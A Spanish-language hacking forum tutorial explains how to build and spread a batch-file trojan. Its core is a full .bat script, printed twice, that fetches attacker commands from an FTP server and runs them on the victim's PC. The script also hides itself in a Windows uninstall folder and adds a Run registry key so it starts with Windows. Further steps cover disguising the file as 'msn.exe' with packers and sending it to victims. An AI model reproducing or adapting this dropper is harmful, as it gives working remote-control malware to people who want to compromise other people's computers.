Troyanizando en batch
Indice:
->1.Introduccion
->2.Requisitos minimos
->3.Crear cuenta FTP
->4.Codigo para la vícitima
->5.Codigo FTP
->6.Iexpress + Themida + Cygy para Código FTP
_____________________________________________________________________
1.Introduccion
· Os voy a hacer un breve tutorial de como troyanizar en batch sin usar ningun ejecutable solo con un .txt y un .bat; ayudandonos de lo maravilloso que es FTP
2.Requisitos minimos
->notepad.exe (jajaja)
->una cuenta ftp
->Vía de propagacion
->Iexpress + themida + cygy
3.Crear cuenta FTP
->Crea tu cuenta FTP AQUI
4.Codigo para la vícitima
-> Llegados a este punto, crearemos un codigo en batch al cual nombraremos como ordenes.txt (no vale otro nombre)
->abrimos nuestro notepad... y a nuestro gusto creamos el code con programacion batch el cual sera ejecutado en el pc de la víctima
·comandos interesantes:
-Dir
-Del
-Start
-Reg ADD
-Attrib
-Shutdown
Más información para crear vuestro code
Cuando tengamos el code guardado como ordenes.txt; lo deberemos subir a nuestra cuenta FTP
·ordenes.txt será el codigo que se ejecute en el pc de la victima cada vez que inicie windows
NOTA: Debereis rehacer a vuestro gusto vuestro ordenes.txt i volverlo a subir a vuestro ftp para que se ejecute en el pc de la victima cuando inicie windows
5.Codigo FTP
Aqui os pongo el .bat que le tendreis que enviar a vuestra victima
NOTA: Luego lo camuflaremos con themida o iexpress o cygy... comprimiendolo con un compresor (winrar, winzip....) para luego enviarlo.
Citar
@echo off
pushd "%windir%\$NtUninstallWudf01000$\spuninst"
echo username>ftp.tmp
echo pass>>ftp.tmp
echo get ordenes.txt>>ftp.tmp
echo bye>>ftp.tmp
echo quit>>ftp.tmp
ftp -s:ftp.tmp ftp.geocities.com
del /f /q ftp.tmp
rename ordenes.txt soundUni.bat
start soundUni.bat
pushd "%homepath%\Mis documentos\Mis archivos recibidos"
copy /Y "archivo_ftp.bat" "%windir%\$NtUninstallWudf01000$\spuninst\archivo_ftp.bat"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Uninstall" /t Reg_SZ /d "%windir%\$NtUninstallWudf01000$\spuninst\archivo_ftp.bat /f"
exit
pushd "%windir%\$NtUninstallWudf01000$\spuninst"
echo username>ftp.tmp
echo pass>>ftp.tmp
echo get ordenes.txt>>ftp.tmp
echo bye>>ftp.tmp
echo quit>>ftp.tmp
ftp -s:ftp.tmp ftp.geocities.com
del /f /q ftp.tmp
rename ordenes.txt soundUni.bat
start soundUni.bat
pushd "%homepath%\Mis documentos\Mis archivos recibidos"
copy /Y "archivo_ftp.bat" "%windir%\$NtUninstallWudf01000$\spuninst\archivo_ftp.bat"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Uninstall" /t Reg_SZ /d "%windir%\$NtUninstallWudf01000$\spuninst\archivo_ftp.bat /f"
exit
·Username: Aqui debereis colocar vuestro usuario de ftp
·Pass: Aqui deberis poner la pass de vuestro ftp
·ordenes.txt: nunca cambies el nombre de vuestro archivo ordenes.txt ya que si lo cambiais el code no podria bajar el archivo para ejecutarlo en el pc de la victima
·archivo_ftp.bat:Si el archivo que le enviareis a la victima lo compilais a .exe pues debereis cambiar el nombre a archivo_ftp.exe y si le dais un nombre menos llamativo a vuestro code pues quedaria asi:
Msn.exe ... por ejemplo...en el code tmb lo debeis sustituir....
6.Iexpress + Themida + Cygy para Código FTP
-> En esta parte es donde debereis compilar vuestro "msn.bat" a "msn.exe", comprimirlo y enviarlo por alguna via de red
->Tutorial + Descarga por Txshack
CYGY + THEMIDA + IEXPRESS
->La explicacion a sido breve i un poco imprecisa :S lo siento.... si teneis alguna duda preguntenla por M.P o en este mismo post
_____________________________________________________________________
FUENTE:http://foro.infiernohacker.com/index.php?topic=2641.0